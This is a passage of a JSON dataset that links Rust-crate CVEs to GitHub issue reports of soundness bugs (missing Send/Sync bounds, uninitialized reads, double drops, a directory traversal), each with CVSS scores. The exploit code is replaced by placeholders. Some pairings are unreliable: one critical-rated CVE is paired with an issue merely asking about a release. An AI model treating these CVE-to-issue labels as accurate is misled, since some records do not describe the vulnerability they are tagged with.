  86094. "description": "Minor soundness issue with Decoder's Send trait. The Send trait for Decoder should probably be APITAG here: URLTAG otherwise it's possible to send Read instances across threads that might not support it. For example APITAG is a Read but is not Send . However, wrapping it in a Decoder allows it to be sent across threads: CODETAG fails with an assertion error because Send is implemented. APITAG found by APITAG gatech's Rust group)",
  86095. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86096. "severity": "HIGH",
  86097. "baseScore": 8.1,
  86098. "impactScore": 5.9,
  86099. "exploitabilityScore": 2.2
  86100. },
  86101. {
  86102. "CVE_ID": "CVE-2021-45706",
  86103. "Issue_Url_old": "https://github.com/iqlusioninc/crates/issues/876",
  86104. "Issue_Url_new": "https://github.com/iqlusioninc/crates/issues/876",
  86105. "Repo_new": "iqlusioninc/crates",
  86106. "Issue_Created_At": "2021-09-24T15:06:20Z",
  86107. "description": "APITAG no op in zeroize_derive NUMBERTAG for enum s. I discovered a bug where APITAG doesn't generate a Drop implementation when used on enum s. It seems to me that it was accidentally fixed by NUMBERTAG in zeroize_derive version NUMBERTAG The bug still exists in version NUMBERTAG If I'm not missing something and this bug is real, version NUMBERTAG should probably be yanked and a report filed at APITAG Advisory Database. APITAG : APITAG APITAG : CODETAG",
  86108. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86109. "severity": "CRITICAL",
  86110. "baseScore": 9.8,
  86111. "impactScore": 5.9,
  86112. "exploitabilityScore": 3.9
  86113. },
  86114. {
  86115. "CVE_ID": "CVE-2020-35915",
  86116. "Issue_Url_old": "https://github.com/Matthias247/futures-intrusive/issues/53",
  86117. "Issue_Url_new": "https://github.com/matthias247/futures-intrusive/issues/53",
  86118. "Repo_new": "matthias247/futures-intrusive",
  86119. "Issue_Created_At": "2020-10-31T19:17:32Z",
  86120. "description": "APITAG should be marked APITAG I think the APITAG object should be marked explicitly as APITAG , it looks like it was automatically given the Sync trait because it only consists of a APITAG reference which itself is Sync . However, the lock guard object itself shouldn't be usable across threads because it assumes it has the lock acquired. APITAG issue was found by APITAG Here's a demonstration of how this can cause Cell , a non Sync but Sendable type to be used across threads to create a data race: ERRORTAG Output: CODETAG",
  86121. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86122. "severity": "MEDIUM",
  86123. "baseScore": 5.5,
  86124. "impactScore": 3.6,
  86125. "exploitabilityScore": 1.8
  86126. },
  86127. {
  86128. "CVE_ID": "CVE-2021-30454",
  86129. "Issue_Url_old": "https://github.com/SolraBizna/outer_cgi/issues/1",
  86130. "Issue_Url_new": "https://github.com/solrabizna/outer_cgi/issues/1",
  86131. "Repo_new": "solrabizna/outer_cgi",
  86132. "Issue_Created_At": "2021-01-31T15:55:30Z",
  86133. "description": "Read on uninitialized buffer may cause UB. Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation NUMBERTAG such occurrences within the same function). This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86134. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86135. "severity": "CRITICAL",
  86136. "baseScore": 9.8,
  86137. "impactScore": 5.9,
  86138. "exploitabilityScore": 3.9
  86139. },
  86140. {
  86141. "CVE_ID": "CVE-2019-15549",
  86142. "Issue_Url_old": "https://github.com/KizzyCode/asn1_der/issues/1",
  86143. "Issue_Url_new": "https://github.com/kizzycode/asn1_der-rust/issues/1",
  86144. "Repo_new": "kizzycode/asn1_der-rust",
  86145. "Issue_Created_At": "2019-06-13T01:40:49Z",
  86146. "description": "Unchecked length can cause memory allocation error.. When de serializing bytes, an arbitrary length of the value can be specified. When building APITAG here: URLTAG This can lead to memory crashes for arbitrary large length values. Perhaps an upper bound is required to prevent crashing applications when de serializing arbitrary byte arrays. This can be reproduced in the following example: CODETAG",
  86147. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86148. "severity": "HIGH",
  86149. "baseScore": 7.5,
  86150. "impactScore": 3.6,
  86151. "exploitabilityScore": 3.9
  86152. },
  86153. {
  86154. "CVE_ID": "CVE-2020-36451",
  86155. "Issue_Url_old": "https://github.com/Xudong-Huang/rcu_cell/issues/3",
  86156. "Issue_Url_new": "https://github.com/xudong-huang/rcu_cell/issues/3",
  86157. "Repo_new": "xudong-huang/rcu_cell",
  86158. "Issue_Created_At": "2020-11-15T02:40:08Z",
  86159. "description": "APITAG bound needed on T for APITAG impl of APITAG Hello! :crab:, while scanning APITAG we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue There is no Send bound on T of Send impl of APITAG There is no Sync bound on T of Sync impl of APITAG ERRORTAG By exploiting this issue, it's possible to send non Send items to other threads, or share a non Sync item concurrently across multiple threads. Proof of Concept You need to run the below program in Debug mode in order to observe undefined behavior. In the program below, multiple threads clone & drop Rc (which is neither Send nor Sync). Since Rc 's internal APITAG is updated by multiple threads without synchronization, the program will terminate in either one of the following states. APITAG NUMBERTAG program panics at the assertion check at the end (indicates memory leak in this case) APITAG NUMBERTAG Rc is dropped while references to it are still alive. When run on Ubuntu NUMBERTAG program crashes with error: APITAG APITAG NUMBERTAG Not impossible, but highly unlikely ERRORTAG How to fix Adding trait bounds to APITAG impls of APITAG as below would be one way to fix the issue. ERRORTAG Thank you for reviewing this issue! :crab:",
  86160. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86161. "severity": "HIGH",
  86162. "baseScore": 8.1,
  86163. "impactScore": 5.9,
  86164. "exploitabilityScore": 2.2
  86165. },
  86166. {
  86167. "CVE_ID": "CVE-2020-36214",
  86168. "Issue_Url_old": "https://github.com/abbychau/multiqueue2/issues/10",
  86169. "Issue_Url_new": "https://github.com/abbychau/multiqueue2/issues/10",
  86170. "Repo_new": "abbychau/multiqueue2",
  86171. "Issue_Created_At": "2020-12-19T13:16:47Z",
  86172. "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue T is not bound to Send in the following Send impls, and thus all queue APIs provided by the crate (except for APITAG APITAG ) can send non Send types to other threads. This can allow data race bugs in safe Rust programs. ERRORTAG Proof of Concept I wrote two example programs that can trigger data race bugs while using this crate. Both programs were tested on APITAG , using APITAG in Debug mode. APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a Cell , causing memory corruption & segmentation fault. APITAG ERRORTAG APITAG APITAG APITAG Program NUMBERTAG APITAG to expand) APITAG This creates a data race to a single Rc , causing either a segmentation fault (illegal instruction) or a memory leak. APITAG ERRORTAG APITAG APITAG Solution One solution for the issue is to add APITAG bounds to the following types' Send impls as below. After making the following changes, the compiler can revoke programs that use the queues to send non Send types to other threads. Please let me know about your opinion on the suggested changes :) ERRORTAG Thank you for reviewing this issue NUMBERTAG",
  86173. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86174. "severity": "MEDIUM",
  86175. "baseScore": 5.9,
  86176. "impactScore": 3.6,
  86177. "exploitabilityScore": 2.2
  86178. },
  86179. {
  86180. "CVE_ID": "CVE-2021-26954",
  86181. "Issue_Url_old": "https://github.com/qwertz19281/rust_utils/issues/3",
  86182. "Issue_Url_new": "https://github.com/qwertz19281/rust_utils/issues/3",
  86183. "Repo_new": "qwertz19281/rust_utils",
  86184. "Issue_Created_At": "2021-02-03T16:01:21Z",
  86185. "description": "Panic safety issue leading to double drop in insert_slice_clone. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that in APITAG , it pushes elements over for insertion using ptr::copy here: URLTAG This can duplicate items in the Vec , after which it calls APITAG , which can potentially panic. This means that during this panic the copied elements can be dropped twice. Here's a quick example of this issue: ERRORTAG This outputs: CODETAG As you can see the first element is being dropped twice. We'd recommend wrapping the vector in APITAG while you're operating on it to prevent this.",
  86186. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
  86187. "severity": "MEDIUM",
  86188. "baseScore": 5.3,
  86189. "impactScore": 1.4,
  86190. "exploitabilityScore": 3.9
  86191. },
  86192. {
  86193. "CVE_ID": "CVE-2020-36471",
  86194. "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/27",
  86195. "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/27",
  86196. "Repo_new": "xudong-huang/generator-rs",
  86197. "Issue_Created_At": "2020-11-16T18:39:16Z",
  86198. "description": "Generator's Send trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that Generator implements Send as long as the closure has a static lifetime. However, this should also probably be bounded by APITAG , otherwise it's possible to smuggle non Send types across thread boundaries. Here's an example of a data race in safe Rust code through a Generator. ERRORTAG Output: APITAG",
  86199. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86200. "severity": "MEDIUM",
  86201. "baseScore": 5.9,
  86202. "impactScore": 3.6,
  86203. "exploitabilityScore": 2.2
  86204. },
  86205. {
  86206. "CVE_ID": "CVE-2020-35889",
  86207. "Issue_Url_old": "https://github.com/shawnscode/crayon/issues/87",
  86208. "Issue_Url_new": "https://github.com/shawnscode/crayon/issues/87",
  86209. "Repo_new": "shawnscode/crayon",
  86210. "Issue_Created_At": "2020-08-31T21:14:54Z",
  86211. "description": "Misbehaving APITAG implementation can lead to memory safety violation. URLTAG URLTAG URLTAG Description Unsafe code in APITAG has time of check to time of use (TOCTOU) bug that can eventually lead to a memory safety violation. APITAG and APITAG implicitly assumes that APITAG trait methods are pure, i.e., they always return the same value. However, this assumption is unsound since APITAG is a safe, public trait that allows a custom implementation. Demonstration Crate: crayon Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG afe NUMBERTAG ERRORTAG Output: CODETAG Return Code NUMBERTAG SIGSEGV)",
  86212. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86213. "severity": "HIGH",
  86214. "baseScore": 8.1,
  86215. "impactScore": 5.9,
  86216. "exploitabilityScore": 2.2
  86217. },
  86218. {
  86219. "CVE_ID": "CVE-2021-26952",
  86220. "Issue_Url_old": "https://github.com/andrewhickman/ms3d/issues/1",
  86221. "Issue_Url_new": "https://github.com/andrewhickman/ms3d/issues/1",
  86222. "Repo_new": "andrewhickman/ms3d",
  86223. "Issue_Created_At": "2021-01-27T03:40:34Z",
  86224. "description": "APITAG : user provided Read on uninitialized buffer may cause UB. Hello :crab:, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG APITAG method creates an uninitialized buffer and passes it to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). This method is invokable from APITAG method. FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. How to fix the issue? The Naive & safe way to fix the issue is to always zero initialize a buffer before lending it to a user provided Read implementation. Note that this approach will add runtime performance overhead of zero initializing the buffer. As of Jan NUMBERTAG there is not yet an ideal fix that works in stable Rust with no performance overhead. Below are links to relevant discussions & suggestions for the fix. Well written document regarding the issue URLTAG Rust RFC NUMBERTAG URLTAG FILETAG Discussion in Rust Internals Forum URLTAG",
  86225. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86226. "severity": "HIGH",
  86227. "baseScore": 7.5,
  86228. "impactScore": 3.6,
  86229. "exploitabilityScore": 3.9
  86230. },
  86231. {
  86232. "CVE_ID": "CVE-2021-45712",
  86233. "Issue_Url_old": "https://github.com/pyros2097/rust-embed/issues/159",
  86234. "Issue_Url_new": "https://github.com/pyrossh/rust-embed/issues/159",
  86235. "Repo_new": "pyrossh/rust-embed",
  86236. "Issue_Created_At": "2021-11-27T19:16:22Z",
  86237. "description": "Directory traversal attack allowed when running in debug mode. ERRORTAG This code will (assuming you have the correct number of APITAG s), print out the contents of your APITAG .",
  86238. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  86239. "severity": "HIGH",
  86240. "baseScore": 7.5,
  86241. "impactScore": 3.6,
  86242. "exploitabilityScore": 3.9
  86243. },
  86244. {
  86245. "CVE_ID": "CVE-2020-35886",
  86246. "Issue_Url_old": "https://github.com/sjep/array/issues/1",
  86247. "Issue_Url_new": "https://github.com/sjep/array/issues/1",
  86248. "Repo_new": "sjep/array",
  86249. "Issue_Created_At": "2020-08-25T23:05:52Z",
  86250. "description": "Multiple security issues including data race, buffer overflow, and uninitialized memory drop. Description arr crate contains multiple security issues. Specifically NUMBERTAG It incorrectly implements APITAG bounds, which allows to smuggle non APITAG types across the thread boundary NUMBERTAG Index and APITAG implementation does not check the array bound NUMBERTAG APITAG drops uninitialized memory. Demonstration Crate: arr Version NUMBERTAG OS: Ubuntu NUMBERTAG LTS Rust: rustc NUMBERTAG nightly NUMBERTAG d NUMBERTAG c5a NUMBERTAG Cargo flags: release ERRORTAG Output: ERRORTAG Return Code NUMBERTAG",
  86251. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86252. "severity": "MEDIUM",
  86253. "baseScore": 4.7,
  86254. "impactScore": 3.6,
  86255. "exploitabilityScore": 1.0
  86256. },
  86257. {
  86258. "CVE_ID": "CVE-2020-36206",
  86259. "Issue_Url_old": "https://github.com/a1ien/rusb/issues/44",
  86260. "Issue_Url_new": "https://github.com/a1ien/rusb/issues/44",
  86261. "Repo_new": "a1ien/rusb",
  86262. "Issue_Created_At": "2020-12-19T01:51:50Z",
  86263. "description": "Unsound APITAG bound for Device and APITAG Hello fellow Rustacean, we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. Issue Description URLTAG URLTAG Device and APITAG implement Send and Sync trait for all T types that implement APITAG . APITAG trait has neither Send nor Sync bound and can be implemented from the user side. This permits writing a custom non thread safe APITAG implementation in safe Rust code, which can cause a data race when used with Device or APITAG . If APITAG is not expected to be implemented by users, making APITAG a sealed trait URLTAG can solve this problem. Otherwise, a proper bound should be added to APITAG implementations of Device and APITAG ( APITAG ) or to the definition of APITAG ( APITAG ).",
  86264. "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
  86265. "severity": "HIGH",
  86266. "baseScore": 7.0,
  86267. "impactScore": 5.9,
  86268. "exploitabilityScore": 1.0
  86269. },
  86270. {
  86271. "CVE_ID": "CVE-2020-36215",
  86272. "Issue_Url_old": "https://github.com/AdrienChampion/hashconsing/issues/1",
  86273. "Issue_Url_new": "https://github.com/adrienchampion/hashconsing/issues/1",
  86274. "Repo_new": "adrienchampion/hashconsing",
  86275. "Issue_Created_At": "2020-11-10T19:27:49Z",
  86276. "description": "APITAG Send and Sync traits should be bounded on the contained type. Currently, APITAG implements the Send and Sync traits unconditionally: URLTAG This is a possible soundness issue because it allows types T that aren't necessarily thread safe to be used across threads as long as they are wrapped in an APITAG . Sort of a contrived example but the following demonstrates a data race that segfaults safe rust using this: APITAG APITAG to expand example APITAG ERRORTAG APITAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  86277. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86278. "severity": "HIGH",
  86279. "baseScore": 7.5,
  86280. "impactScore": 3.6,
  86281. "exploitabilityScore": 3.9
  86282. },
  86283. {
  86284. "CVE_ID": "CVE-2020-36462",
  86285. "Issue_Url_old": "https://github.com/Chopinsky/byte_buffer/issues/2",
  86286. "Issue_Url_new": "https://github.com/chopinsky/byte_buffer/issues/2",
  86287. "Repo_new": "chopinsky/byte_buffer",
  86288. "Issue_Created_At": "2020-11-29T22:11:46Z",
  86289. "description": "Send bound needed on T (for Send impl of APITAG ). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. Issue Currently Send is implemented for APITAG even when T is not bound by Send . ERRORTAG This makes it possible to use APITAG to send a non Send object to other threads. Proof of Concept Below is an example program that exhibits undefined behavior using the syncpool crate. There is a data race on the internal reference count of Rc , and the program either crashes at runtime (e.g. on Ubuntu: APITAG ) , or panics at the end of the program (indicating a memory leak) . Such behavior can be observed when the program is compiled in Debug mode. ERRORTAG The example is a bit contrived, but it triggers undefined behavior in safe Rust code. How to fix the issue The solution is to add a Send bound on T in the Send impl for APITAG as below. I tested the above example using the modified version of the crate, and the compiler was able to successfully reject the program at compile time. ERRORTAG Thank you for checking out this issue :crab:",
  86290. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86291. "severity": "HIGH",
  86292. "baseScore": 8.1,
  86293. "impactScore": 5.9,
  86294. "exploitabilityScore": 2.2
  86295. },
  86296. {
  86297. "CVE_ID": "CVE-2020-36465",
  86298. "Issue_Url_old": "https://github.com/fizyk20/generic-array/issues/98",
  86299. "Issue_Url_new": "https://github.com/fizyk20/generic-array/issues/98",
  86300. "Repo_new": "fizyk20/generic-array",
  86301. "Issue_Created_At": "2020-04-09T21:34:52Z",
  86302. "description": "APITAG unsoundness. The APITAG macro silently and unsoundly extends arbitrary lifetimes to APITAG ( playground URLTAG : ERRORTAG",
  86303. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86304. "severity": "HIGH",
  86305. "baseScore": 7.5,
  86306. "impactScore": 3.6,
  86307. "exploitabilityScore": 3.9
  86308. },
  86309. {
  86310. "CVE_ID": "CVE-2021-38187",
  86311. "Issue_Url_old": "https://github.com/chris-morgan/anymap/issues/37",
  86312. "Issue_Url_new": "https://github.com/chris-morgan/anymap/issues/37",
  86313. "Repo_new": "chris-morgan/anymap",
  86314. "Issue_Created_At": "2019-11-12T22:00:36Z",
  86315. "description": "When is the next crates.io release?. I see a number of commits here, but on crates.io the library is APITAG .",
  86316. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86317. "severity": "CRITICAL",
  86318. "baseScore": 9.8,
  86319. "impactScore": 5.9,
  86320. "exploitabilityScore": 3.9
  86321. },
  86322. {
  86323. "CVE_ID": "CVE-2021-26951",
  86324. "Issue_Url_old": "https://github.com/tafia/calamine/issues/199",
  86325. "Issue_Url_new": "https://github.com/tafia/calamine/issues/199",
  86326. "Repo_new": "tafia/calamine",
  86327. "Issue_Created_At": "2021-01-07T03:14:36Z",
  86328. "description": "APITAG accesses unclaimed/uninitialized memory. Hello :crab: , we APITAG group APITAG gatech) found a memory safety/soundness issue in this crate while scanning Rust code on crates.io for potential vulnerabilities. URLTAG Issue NUMBERTAG Write to unclaimed memory. APITAG is done without reserving extra memory for APITAG . After that, new data is written to the unclaimed memory via APITAG . This seems to be a critical security error, as APITAG can potentially write to memory that is actively occupied by another entity. Issue NUMBERTAG APITAG on uninitialized memory can cause undefined behavior APITAG can potentially pass uninitialized memory to user provided Read implementation. This is unsound, because it allows safe Rust code to exhibit an undefined behavior (read from uninitialized memory). FILETAG from the Read trait documentation explains the issue: > It is your responsibility to make sure that buf is initialized before calling read . Calling read with an uninitialized buf (of the kind one obtains via ERRORTAG ) is not safe, and can lead to undefined behavior. Suggested Fix It would be safe to zero initialize the newly allocated APITAG buffer before APITAG (probably via APITAG ), in order to prevent user provided Read from accessing old contents of the newly allocated heap memory. Thank you for checking out this issue NUMBERTAG",
  86329. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86330. "severity": "CRITICAL",
  86331. "baseScore": 9.8,
  86332. "impactScore": 5.9,
  86333. "exploitabilityScore": 3.9
  86334. },
  86335. {
  86336. "CVE_ID": "CVE-2020-35925",
  86337. "Issue_Url_old": "https://github.com/johnshaw/magnetic/issues/9",
  86338. "Issue_Url_new": "https://github.com/johnshaw/magnetic/issues/9",
  86339. "Repo_new": "johnshaw/magnetic",
  86340. "Issue_Created_At": "2020-11-29T14:21:34Z",
  86341. "description": "Send bound needed on T (for APITAG impl of APITAG types). Hello :crab: , while scanning crates.io, we APITAG group APITAG gatech) have noticed a soundness/memory safety issue in this crate which allows safe Rust code to trigger undefined behavior. All queue types (spsc, spmc, mpsc, mpmc) are used to send an object from one thread to another. Currently, APITAG is implemented for producer/consumer types of all queues without a Send bound on T (as below). ERRORTAG This allows users to send non Send objects to other threads, and can potentially let users write safe Rust code that triggers undefined behavior. Here is a proof of concept that invokes undefined behavior using this crate. Due to the data race on the internal reference count of Rc , the program below either crashes at runtime (On Ubuntu, APITAG ) or panics at the end of the program (indicating a memory leak). ERRORTAG In order to prevent this undefined behavior, we need a Send bound on T for both APITAG impls of producer/consumer types. A Send bound is also needed for the impl of Sync , because it is possible to send objects to other threads by holding a shared reference to the APITAG types. I made a fix that lets the compiler reject programs like the above, and I'll submit a PR right away. Please let us know what you think about the issue or the fix. Thank you for checking out this issue :crab:",
  86342. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86343. "severity": "MEDIUM",
  86344. "baseScore": 5.5,
  86345. "impactScore": 3.6,
  86346. "exploitabilityScore": 1.8
  86347. },
  86348. {
  86349. "CVE_ID": "CVE-2019-16143",
  86350. "Issue_Url_old": "https://github.com/RustCrypto/MACs/issues/19",
  86351. "Issue_Url_new": "https://github.com/rustcrypto/macs/issues/19",
  86352. "Repo_new": "rustcrypto/macs",
  86353. "Issue_Created_At": "2019-08-25T21:27:52Z",
  86354. "description": "Incorrect digest with hmac blake2s. I seem to be getting incorrect results when using the hmac URLTAG crate with blake2s URLTAG . I have verified that the implementation of the hash functions themselves behave identically. HMAC Blake2s : mismatching output APITAG the empty message with the empty key, using Go APITAG for reference: CODETAG Go Playground URLTAG Outputs APITAG ERRORTAG Outputs APITAG HMAC SHA NUMBERTAG identical output The same behaviour does not occur when instantiating HMAC with SHA NUMBERTAG CODETAG Go Playground URLTAG Outputs APITAG ERRORTAG Outputs APITAG I have reason to believe the Rust implementation is at fault: the Go code is used in APITAG and successfully performs cryptographic handshakes with other compatible clients.",
  86355. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86356. "severity": "CRITICAL",
  86357. "baseScore": 9.8,
  86358. "impactScore": 5.9,
  86359. "exploitabilityScore": 3.9
  86360. },
  86361. {
  86362. "CVE_ID": "CVE-2020-35901",
  86363. "Issue_Url_old": "https://github.com/actix/actix-web/issues/1321",
  86364. "Issue_Url_new": "https://github.com/actix/actix-web/issues/1321",
  86365. "Repo_new": "actix/actix-web",
  86366. "Issue_Created_At": "2020-01-24T19:02:37Z",
  86367. "description": "Undefined behavior due to unsafe pinning of APITAG Expected Behavior The program below should not segfault when I only write 'safe' code. Current Behavior The program below segfaults. Possible Solution Change the APITAG trait to take a APITAG instead of a APITAG . Steps to Reproduce (for bugs) Run the following code in debug mode. ERRORTAG Context I found this problem by searching for 'unsafe' in the actix web repo. Rust Version (I.e, output of APITAG ): rustc NUMBERTAG nightly Actix Web Version: actix http NUMBERTAG",
  86368. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  86369. "severity": "HIGH",
  86370. "baseScore": 7.5,
  86371. "impactScore": 3.6,
  86372. "exploitabilityScore": 3.9
  86373. },
  86374. {
  86375. "CVE_ID": "CVE-2020-36441",
  86376. "Issue_Url_old": "https://github.com/SonicFrog/abox/issues/1",
  86377. "Issue_Url_new": "https://github.com/sonicfrog/abox/issues/1",
  86378. "Repo_new": "sonicfrog/abox",
  86379. "Issue_Created_At": "2020-11-10T19:39:29Z",
  86380. "description": "APITAG should have bounds on its APITAG traits. Currently APITAG implements the APITAG traits unconditionally: URLTAG I think this should only be when APITAG and APITAG respectively. Otherwise, this makes it possible to send across types that aren't safe to use across threads such as Cell s. Here's a demonstration that causes a data race: ERRORTAG This outputs: APITAG APITAG found by APITAG gatech's Rust group)",
  86381. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86382. "severity": "HIGH",
  86383. "baseScore": 8.1,
  86384. "impactScore": 5.9,
  86385. "exploitabilityScore": 2.2
  86386. },
  86387. {
  86388. "CVE_ID": "CVE-2020-36437",
  86389. "Issue_Url_old": "https://github.com/longshorej/conqueue/issues/9",
  86390. "Issue_Url_new": "https://github.com/longshorej/conqueue/issues/9",
  86391. "Repo_new": "longshorej/conqueue",
  86392. "Issue_Created_At": "2020-11-24T19:46:07Z",
  86393. "description": "APITAG Send trait and Sync trait should have bounds. Hi there, we APITAG group APITAG gatech) are scanning crates on crates.io for potential soundness bugs. We noticed that the APITAG object implements the Send and Sync traits for all types: URLTAG However, this should probably be bounded by T: Sync and T: Send. Otherwise, it's possible to smuggle non Send types across thread boundaries or share non Sync types across thread boundaries. Here's an example of a data race in safe Rust code through a APITAG . ERRORTAG",
  86394. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86395. "severity": "HIGH",
  86396. "baseScore": 8.1,
  86397. "impactScore": 5.9,
  86398. "exploitabilityScore": 2.2
  86399. },
  86400. {
  86401. "CVE_ID": "CVE-2020-35876",
  86402. "Issue_Url_old": "https://github.com/spacejam/rio/issues/11",
  86403. "Issue_Url_new": "https://github.com/spacejam/rio/issues/11",
  86404. "Repo_new": "spacejam/rio",
  86405. "Issue_Created_At": "2020-02-07T10:19:46Z",
  86406. "description": "mem::forget(completion) unsafety? . It seems to me that the soundness of Completion relies on the fact that it waits for the operation to complete in its Drop impl. But per the leakpocalypse it's safe to just forget the completion, side stepping that?",
  86407. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86408. "severity": "CRITICAL",
  86409. "baseScore": 9.8,
  86410. "impactScore": 5.9,
  86411. "exploitabilityScore": 3.9
  86412. },
  86413. {
  86414. "CVE_ID": "CVE-2020-36463",
  86415. "Issue_Url_old": "https://github.com/schets/multiqueue/issues/31",
  86416. "Issue_Url_new": "https://github.com/schets/multiqueue/issues/31",
  86417. "Repo_new": "schets/multiqueue",
  86418. "Issue_Created_At": "2020-12-26T01:55:23Z",
  86419. "description": "Queues allow non Send types to be sent to other threads, allowing data races. Hello :crab: , I recently submitted a bug report to the FILETAG crate which is maintained from a fork of this crate. The bug was fixed a few days ago in version NUMBERTAG The exact same bug exists for the multiqueue crate as well. FYI, I'll leave a link to the bug report that I submitted for the APITAG crate: URLTAG Thank you for checking out this issue NUMBERTAG",
  86420. "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  86421. "severity": "HIGH",
  86422. "baseScore": 8.1,
  86423. "impactScore": 5.9,
  86424. "exploitabilityScore": 2.2
  86425. },
  86426. {
  86427. "CVE_ID": "CVE-2020-35921",
  86428. "Issue_Url_old": "https://github.com/yoshuawuyts/miow/issues/38",
  86429. "Issue_Url_new": "https://github.com/yoshuawuyts/miow/issues/38",
  86430. "Repo_new": "yoshuawuyts/miow",
  86431. "Issue_Created_At": "2020-11-13T22:59:52Z",
  86432. "description": "Invalidly assumes the memory layout of APITAG miow assumes that the memory layout of APITAG matches APITAG , but this can't be assumed. std makes no such promise to the outside world. The offending code is here: URLTAG Some other crates made the same assumptions, and they are being fixed in URLTAG URLTAG and URLTAG Until this is fixed and published it kind of blocks moving these fundamental network types into core and also stops them from having const fn constructors. See this PR on std for reference: URLTAG",
  86433. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
  86434. "severity": "MEDIUM",
  86435. "baseScore": 5.5,
  86436. "impactScore": 3.6,
  86437. "exploitabilityScore": 1.8
  86438. },
  86439. {
  86440. "CVE_ID": "CVE-2020-35920",
  86441. "Issue_Url_old": "https://github.com/rust-lang/socket2-rs/issues/119",
  86442. "Issue_Url_new": "https://github.com/rust-lang/socket2/issues/119",
  86443. "Repo_new": "rust-lang/socket2",
  86444. "Issue_Created_At": "2020-11-06T07:44:14Z",
  86445. "description": "The code invalidly assumes the memory layout of APITAG This library casts APITAG (and APITAG ) into APITAG : URLTAG As far as I can tell there are no guarantees from std about the layout of APITAG , and this code could silently compile and cause UB elsewhere if the representation changes. This internals forum thread is where this discussion started: URLTAG mio does the same kind of invalid casting: URLTAG",
  86446. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
